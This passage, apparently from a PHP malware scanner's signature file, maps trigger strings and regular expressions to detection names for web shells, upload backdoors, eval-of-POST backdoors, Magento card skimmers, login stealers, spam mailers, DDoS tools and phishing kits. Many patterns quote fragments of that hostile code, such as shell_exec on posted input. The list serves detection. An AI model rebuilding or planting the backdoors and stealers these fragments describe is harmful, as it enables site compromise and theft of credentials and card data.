			'    \$_POST +\[.\w.\]   ' => array(REX_CLEAR_MULTIMATCH, 'rex.spaced_POST.001', 'if[\s]*\([\s]*!empty[\s]*\([\s]*\$_REQUEST[\s]*\)[\s]*\)[\s]*\{[^\$]+if[\s]*\([\s]*!defined[\s]*\([\s]*.PATH.[\s]*\)[\s]*\)[\s]*\{[\s]*define[\s]*\([\s]*.PATH.[\s]*,[\s]*__DIR__[\s]*\)[\s]*;[\s]*\}[^\$]+empty[\s]*\([\s]*\$_POST[\s]*\)[\s]*\)[\s]*\{[^}]+exit[\s]*;[\s]*\}[\s]*else[\s]*\{[^#]+\$_POST[\s]*\[.[\w].\][\s]*\([\s]*\$_POST[\s]*\[.[\w].\][^;]+;[\s]*(\$[\w]+[\s]*\([\s]*\)[\s]*;[\s]*}[\s]*)?(die;[\s]*\}[\s]*)(\/\/[^\n]+[\s]*}?[\s]*)?|if[\s]*\([\s]*!defined[\s]*\([\s]*.PATH.[\s]*\)[\s]*\)[\s]*\{[\s]*define[\s]*\([\s]*.PATH.[\s]*,[\s]*__DIR__[\s]*\)[\s]*;[\s]*\}[^\$]+empty[\s]*\([\s]*\$_POST[\s]*\)[\s]*\)[\s]*\{[^}]+exit[\s]*;[\s]*\}[\s]*else[\s]*\{[^#]+\$_POST[\s]*\[.[\w].\][\s]*\([\s]*\$_POST[\s]*\[.[\w].\][^;]+;[\s]*(\$[\w]+[\s]*\([\s]*\)[\s]*;[\s]*}[\s]*)?(\/\/[^\n]+[\s]*}?[\s]*)?'),
		),

		'"admin_user"))) { die' => array(STR_TRIGGER,
			'); } } foreach ($_POST as' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.009', 'foreach\s*\(\$_GET\s*as\s*\$\w+\)\s*\{\s*if\s*\(substr[^&]+&&\s*\(substr[^\{]+\{\s*die\(.\w+.\);\s*\}[^\(]+\(base64_decode[^;]+;\s*if\s*\(substr[^\{]+\{\s*die\(.\w+.\);\s*\}\s*\}\s*foreach\s*\(\$_POST\s*as\s*\$\w+\)\s*\{\s*if[^\{]+\{\s*die\(.\w+.\);\s*\}\s*\$\w+\s*=\s*strtolower\(base64_decode[^"]+"insert"[^"]+"admin_user"\)\)\)\s*\{\s*die[^;]+;\s*\}\s*\}'),
		),

		'($_POST[\'username\'],$_POST[\'password\'],$_POST[\'port\']' => array(STR_TRIGGER,
			'file_POST_contents($_SERVER[\'DOCUMENT_ROOT\']."/".$' => array(STR_CLEARFILE, 'php.hacktool.generic.015', NULL),
		),

		'$_="b' => array(STR_TRIGGER,
			'preg_replace("/^/e",$_("ZXZ' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.106', NULL),
		),
		
		'system("php' => array(STR_CLEARFILE, 'php.backdoor.system.020', NULL),
		'@extract(array(c=>$b())); function fun2(){$b=$_POST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.extract.006', '@extract\(array\(b=>create_function\([^;]+\);[\s]*@extract\(array\([^;]+;[\s]*function fun[^\}]+\}'),
		'$cd= fetch_value($hhhhh,\'class="blanc">' => array(STR_CLEARFILE, 'php.phishing.generic.053', NULL),
		'<\?\s+(\$\w+)\s*=\s*\$_POST;\s*\$\w+\s*=\s*\1\[' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_post.002', '(?<=\s)\s*(\$\w+)\s*=\s*\$_POST;\s*(\$\w+)\s*=\s*\1[^;]+;\s*(\$\w+)\s*=\s*\1[^;]+;\s*if\(\3\)\s*\{\s*\3\(\2\);[^\}]+\}'),
		'(\$\w+)\s*=\s*\$_REQUEST\[.\w+.\];[^>]+(\$\w+)\s*=\s*array\(\$_POST[^\{]+array_walk_recursive\(\2, \1,[^;]+' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_post.003', '(\$\w+)\s*=\s*\$_REQUEST\[.\w+.\];[^>]+(\$\w+)\s*=\s*array\(\$_POST[^\{]+array_walk_recursive\(\2, \1,[^;]+'),
		'array_map\s*?\(\s*?["\']\w["\']\s*?,\s*?array\s*?\(\s*?\$_POST\[["\']\w["\']\]\s*?\(\s*?\$_POST\[["\']\w["\']\]\s*?\)\s*?\)\s*?\)\s*?;' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_post.005', '\n(?:\/\/ OS system\.\s*)?function\s*?\w+?\s*?\(\s*?\$\w+?\s*?\)\s*?\{\s*?\$_POST\[[^\}]+?\}\s*?array_map\s*?\(\s*?["\']\w["\']\s*?,\s*?array\s*?\(\s*?\$_POST\[["\']\w["\']\]\s*?\(\s*?\$_POST\[["\']\w["\']\]\s*?\)\s*?\)\s*?\)\s*?;'),
		'(\$\w)\s*?=\s*?strtoupper\s*?\(\s*?(\$\w)\[\d\]\s*?(?:\.\s*?\2\[\d+?\]\s*?){4}\)\s*?;\s*?(\$\w)\s*?=' => array(REX_CLEAR_MULTIMATCH, 'rex.key_POST.001', '(\$\w)\s*?=\s*?strtoupper\s*?\(\s*?(\$\w)\[\d\]\s*?(?:\.\s*?\2\[\d+?\]\s*?){4}\)\s*?;\s*?(\$\w)\s*?=\s*?\$\{\s*?\1\s*?\}[^;]+?;\s*?\3\(\s*?\)\s*?;'),
		'(\$\w+) *= *\$_POST\[.\w+[^>]+(\$\w+) *= *\1 *\([^>]+fwrite *\(\2' => array(REX_CLEAR_MULTIMATCH, 'rex.function_through_POST.001', '(?:\$\w+ *= *\$_(?:COOKIE|POST|REQUEST)[^\n]++\n){3}(\$\w+) *= *\$_POST\[.\w+[^>]+(\$\w+) *= *\1 *\([^>]+fwrite *\(\2[^\{]++\{\s*echo .Testing.;\s*\}'),
		'\$\w+\s*=\s*[\'"](s|.x73)(t|.x74)(r|.x72)(_|.x5f)(r|.x72)(e|.x65)(p|.x70)(l|.x6c)(a|.x61)(c|.x63)(e|.x65)[\'"]\s*;\s*\$\w+\s*=\s*\$\w+\(' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.assert.020', '\$\w+\s*=\s*[\'"](s|.x73)(t|.x74)(r|.x72)(_|.x5f)(r|.x72)(e|.x65)(p|.x70)(l|.x6c)(a|.x61)(c|.x63)(e|.x65)[\'"]\s*;\s*\$\w+\s*=\s*\$\w+\([^\)]+\)\s*;\s*\$\w+\s*=\s*\$\w+\(\$\w+\([\'"]\|[\'"],\s*[\'"][\'"],\s*\$_POST\[[^\]]+\]\)\)\s*;\s*\$\w+\s*=\s*[\'"](a|.x61)(s|.x73)(s|.x73)[^;]+;\s*\@\s*\$\w+\s*\(\$\w+\)\s*;\s*\@\s*eval\s*\(\$\w+\);'),
		'\$(\w+)\s*=\s*\$_POST\[\'\1\'\]\s*;\s*\$(\w+)\s*=\s*\$_POST\[\'\2\'\]\s*;\s*file_put_contents\(\$\2\s*,\s*\$\1\s*\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.generic.081', '\$(\w+)\s*=\s*\$_POST\[\'\1\'\]\s*;\s*\$(\w+)\s*=\s*\$_POST\[\'\2\'\]\s*;\s*file_put_contents\(\$\2\s*,\s*\$\1\s*\);'),
		'HTTP.1.1 404 Not Found[^;]+;[\s]*exit\(\);[\s]*\}[\s]*else[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[\'"\\\\]+p[\'"\\\\]+[\s]*\.[\s]*[\'"\\\\]+r[\'"\\\\]+[\s]*\.[\s]*[\'"\\\\]+e[\'"\\\\]+[\s]*\.[\s]*[\'"\\\\]+g[\'"\\\\]+[\s]*\.' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.pregreplace.022', 'if[\s]*\([\s]*!\$_POST\[[^;]+HTTP.1.1 404 Not Found[^;]+;[\s]*exit\(\);[\s]*\}[\s]*else[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[\'"\\\\]+p[\'"\\\\]+[\s]*\.[\s]*[\'"\\\\]+r[\'"\\\\]+[\s]*\.[\s]*[\'"\\\\]+e[\'"\\\\]+[\s]*\.[\s]*[\'"\\\\]+g[\'"\\\\]+[\s]*\.[^}]+}'),
		'\$[\w]=[asert\'\.]{6,};[\s]*\$[\w]=[\'\.eval]{4,};[\s]*@\$[\w]\(.\$[\w]\(.\$_POST' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.107', '\$[\w]=[asert\'\.]{6,};[\s]*\$[\w]=[\'\.eval]{4,};[\s]*@\$[\w]\(.\$[\w]\(.\$_POST\[[\w]+\]\).\);'),
		'Anonymous Email Mail Sender' => array(STR_CLEARFILE, 'php.hacktool.mailer.108', NULL),
		'oFucks($_POST[' => array(STR_CLEARFILE, 'php.hacktool.mailer.133', NULL),
		',"p=".urlencode(base64_encode($d)));function http($url,$post){$' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.013', NULL),
	),

	'echo' => array(STR_TRIGGER,

		'getcwd(' => array(STR_TRIGGER,

			'echo \'<font color="red">Chmod Gagal..' => array(STR_TRIGGER,
				'function perms($file)' => array(STR_CLEARFILE, 'php.backdoor.uploader.282', NULL),
			),

			'@copy($_FILES[' => array(STR_TRIGGER,
				'multipart/form-data' => array(STR_CLEARFILE, 'php.backdoor.uploader.367', NULL),
			),

			'/cpanel3-skel' => array(STR_TRIGGER,
				'if((preg_match("/resetpass/' => array(STR_CLEARFILE, 'php.hacktool.cpanel_reset_password.004', NULL),
			),

			'.htmlspecialchars(file_get_contents($_GET[' => array(STR_TRIGGER,
				'.substr(sprintf(\'%o\', fileperms($' => array(STR_CLEARFILE, 'php.backdoor.generic.099', NULL),
			),

			'Simple Backdoor</title>' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.012', NULL),
			'if( $_POST[\'_act\'] == "Upload!" ) {' => array(STR_CLEARFILE, 'php.backdoor.uploader.168', NULL),
			'$directoryParts = explode(\'/\', ltrim($_POST[\'directory\'], \'/\'))' => array(STR_CLEARFILE, 'php.hacktool.phish_scanner.001', NULL),
			'<?php if(isset($_FILES["userfile"]["name"])){ $uploaddir = getcwd()' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.231', 'if\(isset\(\$_FILES\[.userfile.\]\[.name.\]\)\)\{[\s]*\$uploaddir = getcwd\(\)[^?]+echo[\s]*[^;]+;[\s]*exit;'),
			'echo "Upload Successful' => array(STR_CLEARFILE, 'php.backdoor.uploader.233', NULL),
			'echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.254', NULL),
			'if[\s]*\(move_uploaded_file[\s]*\(\$_FILES\["userfile"\]\["tmp_name"\][\s]*,[\s]*\$uploadfile\)[\s]*\)[\s]*\{[\s]*echo' => array(REX_CLEARFILE, 'php.backdoor.uploader.331', NULL),
			'echo \'<a href="?up&path=\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.368', NULL),
		),

		'gagal' => array(STR_TRIGGER,
			'echo"<b>gagal"' => array(STR_CLEARFILE, 'php.backdoor.gagal.001', NULL),
			'"IndoXploit - Auto Xploiter"' => array(STR_CLEARFILE, 'php.backdoor.indoexploit.001', NULL),
			'Auto Xploiter";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.259', 'if\(isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*echo[^;]+Xploiter[^}]+\}[\s]*else[^}]+[\}\s]+'),
			'if (strstr($email[$columns[' => array(STR_CLEARFILE, 'php.hacktool.dumper.003', NULL),
		),

		'echo \'<input type="file" name="file" size="50"><input name' => array(STR_TRIGGER,

			'echo exec($cmd);' => array(STR_TRIGGER,
				'$cmd=$_GET[\'cmd\'];' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.063.02', 'if[\s]*\([\s]*isset\([\s]*\$_GET\[.cmd.\][\s\)]+\{[\s]*\$cmd=\$_GET\[.cmd.\];[\s]*if[\s]*\(\$cmd[\s]*==[^{]+\{[^}]+if[\s]*\([\s]*@copy[^\?]+echo exec\(\$cmd\);[\s}]+'),
			),

			'echo \'<b><br><br>\'.php_uname().\'<br></b>\';' => array(STR_TRIGGER,
				'Upload GAGAL' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.166', 'echo[\s]*.<b><br><br>.[\s]*\.[\s]*php_uname\(\)[\s]*\..<br[^;]+;[\s]*echo .<form action[^;]+;[\s]*echo .<input[^;]+;[\s]*if[\s]*\([\s]*\$_POST[^}]+\}[\s]*else[\s]*\{[\s]*echo[^;]+GAGAL[^\}]+[\s\}]+'),
			),

			'if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.063', '<\?[^\?]+if\(@copy\(\$_FILES\[.file.\]\[.tmp_name.\],[\s]*\$_FILES\[.file.\]\[.name.\]\)\)[\s]*\{[\s]*echo[\s]*.<b>Upload[^\x02]+?\}[\s]*(echo[^;]*;[\s]*)*\?>'),
		),

		'@file_get_contents(' => array(STR_TRIGGER,

			'if(PHP_SHLIB_SUFFIX == \'dll\'){' => array(STR_TRIGGER,
				'$this->mySQL->locate_fatt_sql();' => array(STR_CLEARFILE, 'php.hacktool.generic.027', NULL),
			),

			'$tmp,1);}else{ break;}' => array(STR_CLEARFILE, 'php.spam-seo.injector_gen.044', NULL),
			'refresh" content="0; URL=https://chase.com' => array(STR_CLEARFILE, 'php.phishing.chasebank.007', NULL),
		),

		'= mail($' => array(STR_TRIGGER,

			';} else {echo \'' => array(STR_TRIGGER,
				': \' . $' => array(STR_CLEARFILE, 'php.hacktool.mailer.099', NULL),
			),

			'$msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);' => array(STR_CLEARFILE, 'php.hacktool.mailer.103', NULL),
		),

		'echo "<h1><a href=\'$fullpath\'>OK-Click' => array(STR_TRIGGER,
			'if (@copy($files[\'tmp_name\'], $fullpath)) {' => array(STR_CLEARFILE, 'php.backdoor.uploader.074', NULL),
			'echo \'<html><head><title>Upload files' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.093', '\$\w+\s*=\s*@\$_FILES\[.\w+.\];\s*if\s*\(\$\w+\[.\w+.\]\s*!=\s*..\)\s*{\s*\$\w+\s*=\s*\$_REQUEST\[.\w+.]\s*.\s*\$\w+\[.\w+.];\s*if\s*\(move_uploaded_file\(\$files\[.tmp_name.],\s*\$\w+\)\)\s*{\s*echo\s*.<h1><a href=.\$\w+.>[^;]+;\s*}\s*}\s*echo\s*.<html><head><title>\s*Upload\s*\w+[^>]+<.title><.head><body>\s*<form\s*method=POST\s*enctype=.multipart.form-data.\s*action[^f]+file[^h]+html>.;'),
		),

		'copy($_FILES[\'idx_file\']' => array(STR_TRIGGER,
			'if(is_writable($root))' => array(STR_TRIGGER,
				'<b><u>$web/$files</u></b></a>' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.264', '<\?php[^\?]+(\?host=\$host[^\?]+)?\$web\/\$files[^\?]+\?>'),
			),
		),

		'$packets = $_POST[' => array(STR_TRIGGER,
			'print "<font color=green><b>' => array(STR_TRIGGER,
				'fsockopen("udp://$ip", $rand, $errno, $errstr' => array(STR_CLEARFILE, 'php.hacktool.ddos.011', NULL),
			),
		),

		'"){if ($_SERVER[\'REQUEST_METHOD\'] == \'POST\') { echo' => array(STR_TRIGGER,
			'echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile' => array(STR_CLEARFILE, 'php.backdoor.uploader.132', NULL),
		),

		'value="<?echo(@getcwd());?>">' => array(STR_TRIGGER,
			'echo "File was succesfully uploaded!";' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.009', NULL),
		),

		'fopen($_POST[\'_edit' => array(STR_TRIGGER,
			'$output = shell_exec($_POST[\'_cmd\']); echo' => array(STR_CLEARFILE, 'php.backdoor.webshell.089', NULL),
		),

		'echo "Sukses"' => array(STR_TRIGGER,
			'array("username" => $username, "password" => $password)' => array(STR_CLEARFILE, 'php.malware.curl.026', NULL),
		),

		'if ($request[\'task\'] == \'changepassword\'){' => array(STR_TRIGGER,
			'echo ($arr_result)?json_encode($arr_result):' => array(STR_CLEARFILE, 'php.hacktool.wp_users.002', NULL),
		),

		'header(\'Location: \' . substr($_SERVER[\'REQUEST_URI\']' => array(STR_TRIGGER,
			'if ((file_exists(PATH . \'/cofiguation.php\')' => array(STR_CLEARFILE, 'php.backdoor.cofiguration.001', NULL),
		),

		'if(empty($_POST[' => array(STR_TRIGGER,
			'>highlight_file</font></h1>";' => array(STR_CLEARFILE, 'php.hacktool.highlight_file.001', NULL), 
		),

		'base64_encode($useragent);' => array(STR_TRIGGER,
			'&UserAgent=' => array(STR_CLEARFILE, 'php.spam-seo.injector.285', NULL),
		),

		'echo "Packet complete at ".time(\'h:i:s\')." with $packets' => array(STR_CLEARFILE, 'php.hacktool.ddos.012', NULL),
		'<input type="submit" value="GeT Passwords' => array(STR_CLEARFILE, 'php.backdoor.code_password.002', NULL),
		'echo(\'[ok] - [s:\'.filesize($_POST[\'fn\']).\'] \'.$_POST[\'fn\']);' => array(STR_CLEARFILE, 'php.backdoor.uploader.027', NULL),
		'echo "<mysqlpass>".$pass[1][0]."</mysqlpass><br>"' => array(STR_CLEARFILE, 'php.hacktool.cms_credentials_stealer.001', NULL),
		'"){$fp = popen($_POST["code"], "r"); while (!feof($fp)) {echo fgets' => array(STR_CLEARFILE, 'php.backdoor.generic.020', NULL),
		'echo antivirus($dir,$exs,$matches) ? \'<div></div>' => array(STR_CLEARFILE, 'php.backdoor.spider_antivirus.001', NULL),
		'<?php echo("<b>Conta:&nbsp;</b>".$_POST[\'conta\']."");?><?php echo("-".$_POST[\'digito\']."");?></td>' => array(STR_CLEARFILE, 'php.phishing.brphisher.001', NULL),
		'$ufile )) { echo "<b>Uploaded !!!</b>" ; } else { echo' => array(STR_CLEARFILE,'php.backdoor.uploader.060', NULL),
		'fwrite($file, \'<?php if(md5($_POST["password"])=="\'.$_POST["md5"].' => array(STR_CLEARFILE, 'php.malware.placeholder.002', NULL),
		'rmdir($dir.$file) or DIE("couldn\'t delete $dir$file<br />");' => array(STR_CLEARFILE, 'php.hacktool.autodestroy.002', NULL),
		'port_range=$_POST[$_GET{' => array(STR_CLEARFILE, 'php.backdoor.darkshell.001.02', NULL),
		'$_POST       )      ) {' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.077', 'if\s*\(\s*\!defined\s*\(\s*.PATH.\s*\)\s*\)[^}]+}[^\(]+\(\s*empty\s*\(\s*\$_POST\s*\)\s*\)\s*{\s*echo[^;]+;\s*exit[^;]+;\s*}\s*else\s*{[^\$]+\$\w+\s*=\s*\$_POST\s*\[.\w+.]\s*\([^\$]+\$_POST\s*\[.\w+.\]\s*\(\s*\$_POST\s*\[.\w+.\]\s*\([^;]+;\s*\$\w+\s*\(\)\s*;'),
		'payment_form" method="POST" action="http' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.070', '<form\s*id\s*=\s*"\w+\s*"\s*method\s*=\s*"POST"\s*action\s*=\s*"http[^<]+<\?php\s*echo\s*htmlspecialchars\(\$this->getFormAction\s*\(\)\)\s*;\s*\?>"\s*method\s*=\s*"POST">'),
		'include(\'../antibots.php\')' => array(STR_CLEARFILE, 'php.phishing.paypal.016', NULL),
		'function [\w]+[\s]*\(\$[\w]\)[\s]*\{[\s]*preg_replace_callback[\s]*\(.\|\|.[\s]*,[\s]*\$_POST\[.[\w].\][\s]*\([\s]*\'\'[\s]*,[\s]*\$[\w]+->getMessage' => array(REX_CLEARFILE, 'php.backdoor.eval_POST.120', NULL),
		'$handle = popen(\'/bin/ping\'.$sendmail, \'r\');' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.063', 'if \(isset\(\$_POST\[[^\]]+\]\)\)[\s]*\{[^\$]+\$[\w]+[\s]*=[\s]*\(\'[^\']+\'\);[\s]*\$[\w]+[\s]*=[\s]*preg_replace\(..\[\^ a-z.d\].ui[^;]+\);[\s]*\$[\w]+[\s]*=[\s]*\$_POST\[[^;]+\];[^\$]+\$handle[\s]=[\s]*popen\(..bin.ping.[\s]*\.[\s]*\$[\w]+,[\s]*.r.\);[\s]*echo[^\}]+pclose\(\$[\w]+\);[\s]*\}'),
	),

	'isset($_POST[' => array(STR_TRIGGER,

		'exit' => array(STR_TRIGGER,

			'unlink(__DIR__' => array(STR_TRIGGER,

				'case \'get_post_content\':' => array(STR_TRIGGER,
					'$permalink = get_permalink($_POST[\'id' => array(STR_CLEARFILE, 'php.malware.db_injector.008', NULL),
				),

				'hash(\'sha512\',$link);' => array(STR_CLEARFILE, 'php.malware.redirect.040', NULL),
			),

			'=$_POST[$_SERVER{' => array(STR_TRIGGER,
				'],$cont);}exit;}if(!$_SERVER{' => array(STR_CLEARFILE, 'php.backdoor.generic.077', NULL),
			),

			',\'w\') or die ("Error opening file' => array(STR_TRIGGER,
				'="<meta name=\'google-site-verification\' content=\'$' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.063', NULL),
			),

			'";}else{print "info:' => array(STR_TRIGGER,
				'){echo \'<input name="userfile[]"' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.010', NULL),
			),

			'@error_reporting(0);' => array(STR_TRIGGER,
				'if (isset($_POST["code"]))' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.069', NULL),
				'FilesMen()' => array(STR_CLEARFILE, 'php.backdoor.filesman.085', NULL),
			),

			'header(\'Location: http' => array(STR_TRIGGER,
				'] * $_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.header_location.027', 'if\s*\(isset\(\$_POST\[.\w+.\]\)\s*\&\&\s*isset\(\$_POST\[.\w+.\]\)\)\s*{\s*echo\s*\$_POST\[.\w+.\]\s*\*\s*\$_POST\[.\w+.\]\s*;\s*exit\s*;\s*}\s*header\(.Location:\s*http[^\)]+\)\s*;'),
			),

			')){die;}return base64_decode($' => array(STR_CLEARFILE, 'php.malware.base64.029', NULL),

			' <p>Daher.Ps Go' => array(STR_CLEARFILE, 'php.backdoor.generic.080', NULL),
			'$email = @base64_decode($email);' => array(STR_CLEARFILE, 'php.malware.redirect.013', NULL),
			'>SUCCESS UPLOAD : </font><a href=\'$web$file\' target' => array(STR_CLEARFILE, 'php.backdoor.uploader.313', NULL),
			'tempnam(sys_get_temp_dir(),mt_rand(0,9999));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.pack.007', 'if\(isset\(\$_POST\[.[\w]+.\]\)[\s]*and[\s]*!empty\(\$_POST\[.[\w]+.\]\)\)[\s]*\{[\s]*\$[\w]+[^;]+;[\s]*\$[\w]+\([\d]+\);[\s]*\$[\w]+[\s]*=[\s]*tempnam\(sys_get_temp_dir\(\),mt_rand\([\d]+,[\d]+\)\);[\s]*global[\s]*\$[\w]+\;[^\}]+spl_autoload_extensions\(\$[\w]+\);[\s]*spl_autoload\(.[\w]*.\);[\s]*exit;[\s]*\}'),
		),

		'die(' => array(STR_TRIGGER,

			'x___' => array(STR_TRIGGER,
				'et2ECY+1qlT99xhzbpvMcclsXa/lpd9yLGAqK7iLs' => array(STR_CLEARFILE, 'php.malware.strrev.008', NULL),
			),

			',);}}$GLOBALS[' => array(STR_TRIGGER,
				')]=hex2bin(' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.075', 'class [\w]+[\s]*\{[\s]*private[\s]*static[\s]*\$[\w]+;[\s]*static[\s]*function[\s]*[\w]+\([^\{]+\{[\s]*if[\s]*\([\s]*!self::[^\}]+\}[\s]*private[\s]*static[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*self::[\s]*\$[\w]+[\s]*=[\s]*array[^\n]+(endif;endif;|echo[\s]*\$body;[\s]*\$GLOBALS\[[^;]+\);)'),
			),

			'mysql_query ("UPDATE ".$table_prefix."users SET user_pass = \'".$_POST[\'hash\']."\' WHERE id =".$_POST[\'id\'])' => array(STR_CLEARFILE, 'php.malware.wp_login_stealer.002', NULL),
			' if ((strpos($_SERVER[\'REQUEST_URI\'], \'checkout/onepage\')) or (strpos($_SERVER[\'REQUEST_URI\'], \'simplecheckout\')) or (strpos($_SERVER[\'REQUEST_URI\'], \'onepagecheckout\'))' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.016', 'if.\(isset\(\$_POST\).\&\&.is_array\(\$_POST\).\&\&.count\(\$_POST\).\>.0\).\{\s+\$\w+.\=.\"\w+\"\;[^_]*_SERVER\[\'DOCUMENT_ROOT\'\].\..\'\/var\/tmp\/\'[^4]*4_encode\(str_rot13\(base64_encode\(serialize\(\$\w+\)\)\)\)...\".r.n\"\;\s+\$\w+.\=.fopen\(\$[^d]*delete\'\][^d]*die\(\);\s+}[^}]*}\s+}'),
			'if \(.isset\(\$_POST\[.(\w+).\]\)\)\s*\{die' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.008.03', 'if \(!isset\((\$_POST\[.\w+.\])\)\)\s*\{die[^\}]+\}\s*eval\(\1\);'),
		),

		'if(@isset($_POST[' => array(STR_TRIGGER,

			'mail($' => array(STR_TRIGGER,
				'Content-type:text/html' => array(STR_TRIGGER,
					'echo "<br>Sending Email To : ".$email." => Done";' => array(STR_CLEARFILE, 'php.hacktool.mailer.146', NULL),
				),
			),

			'if(@copy(@urldecode($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.043','if\\(@isset\\(._POST\\[.[\\w]{28,}.\\]\\)\\)[^;]+@urldecode[^;]+\\);'),
			'@preg_replace(\'/(.*)/e\', @str_replace' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.044','if\\(@isset\\(._POST\\[.[\\w]{28,}.\\]\\)\\)[^;]+@urldecode[^;]+\\);'),
		),

		'stripslashes($_POST["php' => array(STR_TRIGGER,
			'{@$_POST["php_func"](stripslashes' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.047', 'if\(isset\(\$_POST\[.php_func[^\n]+@\$_POST\[.php_func.\]\(stripslashes\(\$_POST\[.php[^\}]+\};?[\s]*(if\(isset\(\$_SERVER[^\}]+\}[\s]*)*(\$_SERVER\[.HTTP[^\]]+\][\s]*=[\s]*str_replace\(array[^;]+;[\s]*)*'),
			'{@eval(stripslashes($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.047.02', '<.php\s*if.isset.._POST..php+..\)\)\{\@eval.stripslashes[^;\}]+;\};\s*\?>'),
		),

		'$orderslist=explode(' => array(STR_TRIGGER,
			'query_string = $_POST[' => array(STR_TRIGGER,
				'$action = (isset($_GET[' => array(STR_CLEARFILE, 'php.backdoor.generic.049', NULL),
			),
		),

		'while($i<' => array(STR_TRIGGER,
			'$_POST[$p1]=$_POST[$p2];' => array(STR_TRIGGER,
				'if(isset($_GET[$p1]) || isset($_POST[$p1])' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.132', '\$p1[\s]*=[^;]+;[\s]*\$p1[\s]*=[^;]+;[\s]*\$i[\s]*=[\s]*[\d]+;[\s]*while\(\$i<[^\n]+\$_POST\[\$p2\];[\s\}]*(\/\*[^\*]+\*\/[\s]*)?'),
			),
		),

		'"])) die;' => array(STR_TRIGGER,
			'curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($_POST));' => array(STR_TRIGGER,
				'$url = \'http' => array(STR_CLEARFILE, 'php.backdoor.uploader.354', NULL),
			),
		),

		'$urls[$request_count] = "http' => array(STR_TRIGGER,
			'$domains = preg_split(\'/\s*(\r\n|\n|\r)\s*/\', trim($data), NULL, PREG_SPLIT_NO_EMPTY);' => array(STR_CLEARFILE, 'php.spam-seo.injector.230', NULL),
		),

		'$myUpload = new maxUpload();' => array(STR_TRIGGER,
			'echo \'<p class="msg">\'.$msg.\'</p>\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.157', NULL),
		),

		'You don\'t have permission to access ".$_SERVER' => array(STR_TRIGGER,
			'<a href=\'$pile\' target=\'_blank\'>' => array(STR_CLEARFILE, 'php.backdoor.uploader.292', NULL),
		),

		'if (isset($_POST[\'upload_plugin\']) || isset($_POST[\'upload_theme\'])' => array(STR_CLEARFILE, 'php.backdoor.wp-uploader.003', NULL),
		'</form>\';if(isset($_POST[\'g\'])' => array(STR_CLEARFILE, 'php.backdoor.uploader.108', NULL),
		'if(isset($_POST[\'c\']))file_put_contents' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.generic.061', 'echo.\w+.\..\w+.;if\(isset\(\$_POST\[.\w+.\]\)\)file_put_contents\(.\w+([?:\-\w+])+\.\w+.,\$_POST\[.\w+.\]\);'),
		'));}elseif(function_exists(\'call_user_func\')){call_user_func(\'system\',' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.system.007', 'if\(isset\(\$_[^\n]+?\)\);}elseif\(function_exists\(\'call_user_func\'\)\){call_user_func\(\'system\',\$c\);}else{system\([^\)]+?\);\}\}'),
		'This plugin redirects your mobile traffic to\' ); echo \' \' . $redirect_url;' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.005.02', NULL),
		'html = "<!--$unicid-->".trim($slova[array_rand($slova, 1)])."<!--/$unicid-->";' => array(STR_CLEARFILE, 'php.malware.db_injector.002', NULL),
		'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBl' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.011', NULL),
		'Password: {$userdata[\'password\']}' => array(STR_CLEARFILE, 'php.phishing.mailer.052', NULL),
		'eval (get_magic_quotes_gpc()==1?stripslashes($_POST[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.083', NULL),
